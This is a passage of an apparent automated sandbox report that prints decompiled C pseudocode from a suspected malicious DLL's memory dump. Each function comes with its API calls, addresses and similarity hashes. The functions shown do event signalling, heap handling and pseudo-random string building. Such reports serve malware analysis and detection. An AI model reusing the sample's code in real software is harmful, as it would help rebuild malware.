				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E02F99763(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E02F9A022(_t23);
						}
					}
					return _t38;
				}
				if(E02F9A72D(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x2f9d2a8, 1, 0,  *0x2f9d344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E02F98A51(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E02F917D5(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E02F91F99(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E02F942EA( &_v32, _t39);
					goto L13;
				}
			}












                                                                                                                                                                                                                                    0x02f93bf1
                                                                                                                                                                                                                                    0x02f93bfe
                                                                                                                                                                                                                                    0x02f93c04
                                                                                                                                                                                                                                    0x02f93c05
                                                                                                                                                                                                                                    0x02f93c06
                                                                                                                                                                                                                                    0x02f93c07
                                                                                                                                                                                                                                    0x02f93c08
                                                                                                                                                                                                                                    0x02f93c0c
                                                                                                                                                                                                                                    0x02f93c18
                                                                                                                                                                                                                                    0x02f93c1c
                                                                                                                                                                                                                                    0x02f93ca4
                                                                                                                                                                                                                                    0x02f93ca4
                                                                                                                                                                                                                                    0x02f93ca7
                                                                                                                                                                                                                                    0x02f93ca9
                                                                                                                                                                                                                                    0x02f93cb1
                                                                                                                                                                                                                                    0x02f93cb1
                                                                                                                                                                                                                                    0x02f93cb7
                                                                                                                                                                                                                                    0x02f93cba
                                                                                                                                                                                                                                    0x02f93cba
                                                                                                                                                                                                                                    0x02f93cb7
                                                                                                                                                                                                                                    0x02f93cc5
                                                                                                                                                                                                                                    0x02f93cc5
                                                                                                                                                                                                                                    0x02f93c2f
                                                                                                                                                                                                                                    0x02f93c31
                                                                                                                                                                                                                                    0x02f93c31
                                                                                                                                                                                                                                    0x02f93c48
                                                                                                                                                                                                                                    0x02f93c4c
                                                                                                                                                                                                                                    0x02f93c4f
                                                                                                                                                                                                                                    0x02f93c5a
                                                                                                                                                                                                                                    0x02f93c61
                                                                                                                                                                                                                                    0x02f93c61
                                                                                                                                                                                                                                    0x02f93c6d
                                                                                                                                                                                                                                    0x02f93c6e
                                                                                                                                                                                                                                    0x02f93c7c
                                                                                                                                                                                                                                    0x02f93c70
                                                                                                                                                                                                                                    0x02f93c70
                                                                                                                                                                                                                                    0x02f93c71
                                                                                                                                                                                                                                    0x02f93c72
                                                                                                                                                                                                                                    0x02f93c73
                                                                                                                                                                                                                                    0x02f93c74
                                                                                                                                                                                                                                    0x02f93c75
                                                                                                                                                                                                                                    0x02f93c75
                                                                                                                                                                                                                                    0x02f93c81
                                                                                                                                                                                                                                    0x02f93c86
                                                                                                                                                                                                                                    0x02f93c88
                                                                                                                                                                                                                                    0x02f93c8a
                                                                                                                                                                                                                                    0x02f93c8a
                                                                                                                                                                                                                                    0x02f93c91
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93c93
                                                                                                                                                                                                                                    0x02f93c93
                                                                                                                                                                                                                                    0x02f93ca0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f93ca0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(02F9D2A8,00000001,00000000,00000040,00000001,?,76D7F710,00000000,76D7F730,?,?,?,02F96880,?,00000001,?), ref: 02F93C42
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,02F96880,?,00000001,?,00000002,?,?,02F92417,?), ref: 02F93C4F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000BB8,?,?,?,02F96880,?,00000001,?,00000002,?,?,02F92417,?), ref: 02F93C5A
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02F96880,?,00000001,?,00000002,?,?,02F92417,?), ref: 02F93C61
                                                                                                                                                                                                                                      • Part of subcall function 02F98A51: WaitForSingleObject.KERNEL32(00000000,?,?,?,02F93C81,?,02F93C81,?,?,?,?,?,02F93C81,?), ref: 02F98B2B
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2559942907-0
                                                                                                                                                                                                                                    • Opcode ID: e9650a71283e404cdc7f8d225872676838c0b56873d545df934f5a790644968d
                                                                                                                                                                                                                                    • Instruction ID: 8e055b07beb7b751d89eec0adb1d50c01ff6e403c06410d78de08ae6c3a5e0f3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9650a71283e404cdc7f8d225872676838c0b56873d545df934f5a790644968d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EB219272D0021DABEF10BFE498849EEB7BAEF483D4B014469EB11E7200D775D985CBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9788B, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                                                                                                    			E02F9788B(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x2f9d238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x2f9d250; // 0xd1e1022a
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x2f9d250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                                                                                                                                                                                                    0x02f97893
                                                                                                                                                                                                                                    0x02f97896
                                                                                                                                                                                                                                    0x02f9789c
                                                                                                                                                                                                                                    0x02f978b4
                                                                                                                                                                                                                                    0x02f978b8
                                                                                                                                                                                                                                    0x02f978bb
                                                                                                                                                                                                                                    0x02f978bd
                                                                                                                                                                                                                                    0x02f978c0
                                                                                                                                                                                                                                    0x02f978c2
                                                                                                                                                                                                                                    0x02f978c5
                                                                                                                                                                                                                                    0x02f978c7
                                                                                                                                                                                                                                    0x02f978c7
                                                                                                                                                                                                                                    0x02f978c9
                                                                                                                                                                                                                                    0x02f978d4
                                                                                                                                                                                                                                    0x02f978d9
                                                                                                                                                                                                                                    0x02f978ea
                                                                                                                                                                                                                                    0x02f978f2
                                                                                                                                                                                                                                    0x02f978f7
                                                                                                                                                                                                                                    0x02f978fa
                                                                                                                                                                                                                                    0x02f978fd
                                                                                                                                                                                                                                    0x02f978ff
                                                                                                                                                                                                                                    0x02f97905
                                                                                                                                                                                                                                    0x02f97908
                                                                                                                                                                                                                                    0x02f97908
                                                                                                                                                                                                                                    0x02f97908
                                                                                                                                                                                                                                    0x02f97913
                                                                                                                                                                                                                                    0x02f97918
                                                                                                                                                                                                                                    0x02f97922

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,02F9839A,00000000,?,?,02F9A428,?,033E95B0), ref: 02F97896
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 02F978AE
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,-00000008,?,?,?,02F9839A,00000000,?,?,02F9A428,?,033E95B0), ref: 02F978F2
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000001,?,00000001), ref: 02F97913
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: memcpy$AllocateHeaplstrlen
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1819133394-0
                                                                                                                                                                                                                                    • Opcode ID: 028c731b3e475249ac11b63ad2e08535f6b03c1bf261a28ccc75281b5c7fd8ff
                                                                                                                                                                                                                                    • Instruction ID: da74cee92b7cbaeebd22fc715efbe1d770e754fca160503e412b1dc2d284b06a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 028c731b3e475249ac11b63ad2e08535f6b03c1bf261a28ccc75281b5c7fd8ff
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 201106B2E40218AFD7109F69DC84E9EFBAAEBC57A0B140166F505D7250E7709E14C7A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F97A9A, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E02F97A9A(intOrPtr _a4, intOrPtr _a8) {
				char _v20;
				void* _t8;
				void* _t13;
				void* _t16;
				char* _t18;
				void* _t19;

				_t19 = 0x27;
				_t1 =  &_v20; // 0x74666f53
				_t18 = 0;
				E02F96B43(_t8, _t1);
				_t16 = E02F92049(_t19);
				if(_t16 != 0) {
					_t3 =  &_v20; // 0x74666f53
					_t13 = E02F986D8(_t3, _t16, _a8);
					if(_a4 != 0) {
						__imp__(_a4);
						_t19 = _t13 + 0x27;
					}
					_t18 = E02F92049(_t19);
					if(_t18 != 0) {
						 *_t18 = 0;
						if(_a4 != 0) {
							__imp__(_t18, _a4);
						}
						__imp__(_t18, _t16);
					}
					E02F99039(_t16);
				}
				return _t18;
			}









                                                                                                                                                                                                                                    0x02f97aa5
                                                                                                                                                                                                                                    0x02f97aa6
                                                                                                                                                                                                                                    0x02f97aa9
                                                                                                                                                                                                                                    0x02f97aab
                                                                                                                                                                                                                                    0x02f97ab6
                                                                                                                                                                                                                                    0x02f97aba
                                                                                                                                                                                                                                    0x02f97abf
                                                                                                                                                                                                                                    0x02f97ac3
                                                                                                                                                                                                                                    0x02f97acb
                                                                                                                                                                                                                                    0x02f97ad0
                                                                                                                                                                                                                                    0x02f97ad8
                                                                                                                                                                                                                                    0x02f97ad8
                                                                                                                                                                                                                                    0x02f97ae1
                                                                                                                                                                                                                                    0x02f97ae5
                                                                                                                                                                                                                                    0x02f97aeb
                                                                                                                                                                                                                                    0x02f97aee
                                                                                                                                                                                                                                    0x02f97af4
                                                                                                                                                                                                                                    0x02f97af4
                                                                                                                                                                                                                                    0x02f97afc
                                                                                                                                                                                                                                    0x02f97afc
                                                                                                                                                                                                                                    0x02f97b03
                                                                                                                                                                                                                                    0x02f97b03
                                                                                                                                                                                                                                    0x02f97b0e

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                      • Part of subcall function 02F986D8: wsprintfA.USER32 ref: 02F98734
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(02F923E9,00000000,00000000,00000027,00000005,00000000,00000000,02F996DA,74666F53,00000000,02F923E9,02F9D00C,?,02F923E9), ref: 02F97AD0
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F97AF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 02F97AFC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AllocateHeaplstrcatlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                    • String ID: Soft
                                                                                                                                                                                                                                    • API String ID: 393707159-3753413193
                                                                                                                                                                                                                                    • Opcode ID: 50ac3547a67375e14a2cd5416a2f767b0942dee09b455e92a6685c58139706e7
                                                                                                                                                                                                                                    • Instruction ID: ae5b84599604b04728362cecd74dd33bb599c8a5e177b2807b98afe9bba419bd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 50ac3547a67375e14a2cd5416a2f767b0942dee09b455e92a6685c58139706e7
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF01F272500209B7EF027FA69C84AEFBB6DEF856C5F044422FA0599024EB758A45CBA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F97C61, Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F97C61(void* __esi) {
				struct _SECURITY_ATTRIBUTES* _v4;
				void* _t8;
				void* _t10;

				_v4 = 0;
				memset(__esi, 0, 0x38);
				_t8 = CreateEventA(0, 1, 0, 0);
				 *(__esi + 0x1c) = _t8;
				if(_t8 != 0) {
					_t10 = CreateEventA(0, 1, 1, 0);
					 *(__esi + 0x20) = _t10;
					if(_t10 == 0) {
						CloseHandle( *(__esi + 0x1c));
					} else {
						_v4 = 1;
					}
				}
				return _v4;
			}






                                                                                                                                                                                                                                    0x02f97c6b
                                                                                                                                                                                                                                    0x02f97c6f
                                                                                                                                                                                                                                    0x02f97c84
                                                                                                                                                                                                                                    0x02f97c88
                                                                                                                                                                                                                                    0x02f97c8b
                                                                                                                                                                                                                                    0x02f97c91
                                                                                                                                                                                                                                    0x02f97c95
                                                                                                                                                                                                                                    0x02f97c98
                                                                                                                                                                                                                                    0x02f97ca3
                                                                                                                                                                                                                                    0x02f97c9a
                                                                                                                                                                                                                                    0x02f97c9a
                                                                                                                                                                                                                                    0x02f97c9a
                                                                                                                                                                                                                                    0x02f97c98
                                                                                                                                                                                                                                    0x02f97cb1

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.NTDLL ref: 02F97C6F
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,76D681D0), ref: 02F97C84
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 02F97C91
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 02F97CA3
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandlememset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2812548120-0
                                                                                                                                                                                                                                    • Opcode ID: d64ba341f49425c89a8e5a0197cf30968aa0e3caa55d6908fb92002039179115
                                                                                                                                                                                                                                    • Instruction ID: a4ee9a7eb9fff7b314be4cb3c906ac431c83819354216d64c2c24ebf67e52af8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d64ba341f49425c89a8e5a0197cf30968aa0e3caa55d6908fb92002039179115
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8F0FEF551430CBFF7146F26ECC1C27FBACFB851D9B11892EF14681551D632A8198AB0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F975E9, Relevance: 6.0, APIs: 4, Instructions: 29sleepmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E02F975E9(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x2f9d32c; // 0x33e95b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x2f9d32c; // 0x33e95b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x2f9d030) {
					HeapFree( *0x2f9d238, 0, _t8);
				}
				_t14[1] = E02F994A9(_v0, _t14);
				_t11 =  *0x2f9d32c; // 0x33e95b0
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}










                                                                                                                                                                                                                                    0x02f975e9
                                                                                                                                                                                                                                    0x02f975e9
                                                                                                                                                                                                                                    0x02f975f2
                                                                                                                                                                                                                                    0x02f97602
                                                                                                                                                                                                                                    0x02f97602
                                                                                                                                                                                                                                    0x02f97607
                                                                                                                                                                                                                                    0x02f9760c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f975fc
                                                                                                                                                                                                                                    0x02f975fc
                                                                                                                                                                                                                                    0x02f9760e
                                                                                                                                                                                                                                    0x02f97612
                                                                                                                                                                                                                                    0x02f97624
                                                                                                                                                                                                                                    0x02f97624
                                                                                                                                                                                                                                    0x02f97634
                                                                                                                                                                                                                                    0x02f97637
                                                                                                                                                                                                                                    0x02f9763c
                                                                                                                                                                                                                                    0x02f97640
                                                                                                                                                                                                                                    0x02f97646

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F975F2
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,02F923DE), ref: 02F975FC
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,?,02F923DE), ref: 02F97624
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F97640
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: 750d8d3ab05413484c62d070fe3b28590a24d51cd1051112ee9a4e0782a18593
                                                                                                                                                                                                                                    • Instruction ID: 31a8b6a194a7e0959e27bf4f86b76efb46bb4036894a08705669de8123c3e5ef
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 750d8d3ab05413484c62d070fe3b28590a24d51cd1051112ee9a4e0782a18593
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F0DAB1E50245DBEB14AB79D949F16F7A4AF18BC1F148806FA02D6260D770E820CE25
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9970F, Relevance: 6.0, APIs: 4, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F9970F() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x2f9d26c; // 0x344
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x2f9d2b8; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x2f9d26c; // 0x344
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x2f9d238; // 0x2ff0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}








                                                                                                                                                                                                                                    0x02f9970f
                                                                                                                                                                                                                                    0x02f99716
                                                                                                                                                                                                                                    0x02f99760
                                                                                                                                                                                                                                    0x02f99762
                                                                                                                                                                                                                                    0x02f99762
                                                                                                                                                                                                                                    0x02f9971a
                                                                                                                                                                                                                                    0x02f99720
                                                                                                                                                                                                                                    0x02f99725
                                                                                                                                                                                                                                    0x02f99729
                                                                                                                                                                                                                                    0x02f9972f
                                                                                                                                                                                                                                    0x02f99736
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f99738
                                                                                                                                                                                                                                    0x02f9973d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9973d
                                                                                                                                                                                                                                    0x02f9973f
                                                                                                                                                                                                                                    0x02f99747
                                                                                                                                                                                                                                    0x02f9974a
                                                                                                                                                                                                                                    0x02f9974a
                                                                                                                                                                                                                                    0x02f99750
                                                                                                                                                                                                                                    0x02f99757
                                                                                                                                                                                                                                    0x02f9975a
                                                                                                                                                                                                                                    0x02f9975a
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000344,00000001,02F98099), ref: 02F9971A
                                                                                                                                                                                                                                    • SleepEx.KERNEL32(00000064,00000001), ref: 02F99729
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000344), ref: 02F9974A
                                                                                                                                                                                                                                    • HeapDestroy.KERNEL32(02FF0000), ref: 02F9975A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseDestroyEventHandleHeapSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 4109453060-0
                                                                                                                                                                                                                                    • Opcode ID: 63fbbb30a98c24bc0c01b7e78cb421ab49d1d8ec801e4bdd76362c25717e58ca
                                                                                                                                                                                                                                    • Instruction ID: 1292c529d8555b9010170fbaccf787a4b883112d8d3bc7182c1e8621cfb80e0d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 63fbbb30a98c24bc0c01b7e78cb421ab49d1d8ec801e4bdd76362c25717e58ca
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74F0A030F8530C4BEF207F36A888B06B7A8AB04FD0B160E09BA14D3290DF66D420D661
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F9A5D6, Relevance: 6.0, APIs: 4, Instructions: 28sleepmemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E02F9A5D6() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x2f9d32c; // 0x33e95b0
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x2f9d32c; // 0x33e95b0
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x2f9d32c; // 0x33e95b0
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x2f9e836) {
					HeapFree( *0x2f9d238, 0, _t10);
					_t7 =  *0x2f9d32c; // 0x33e95b0
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}









                                                                                                                                                                                                                                    0x02f9a5d6
                                                                                                                                                                                                                                    0x02f9a5df
                                                                                                                                                                                                                                    0x02f9a5ef
                                                                                                                                                                                                                                    0x02f9a5ef
                                                                                                                                                                                                                                    0x02f9a5f4
                                                                                                                                                                                                                                    0x02f9a5f9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9a5e9
                                                                                                                                                                                                                                    0x02f9a5e9
                                                                                                                                                                                                                                    0x02f9a5fb
                                                                                                                                                                                                                                    0x02f9a600
                                                                                                                                                                                                                                    0x02f9a604
                                                                                                                                                                                                                                    0x02f9a617
                                                                                                                                                                                                                                    0x02f9a61d
                                                                                                                                                                                                                                    0x02f9a61d
                                                                                                                                                                                                                                    0x02f9a626
                                                                                                                                                                                                                                    0x02f9a628
                                                                                                                                                                                                                                    0x02f9a62c
                                                                                                                                                                                                                                    0x02f9a632

                                                                                                                                                                                                                                    APIs
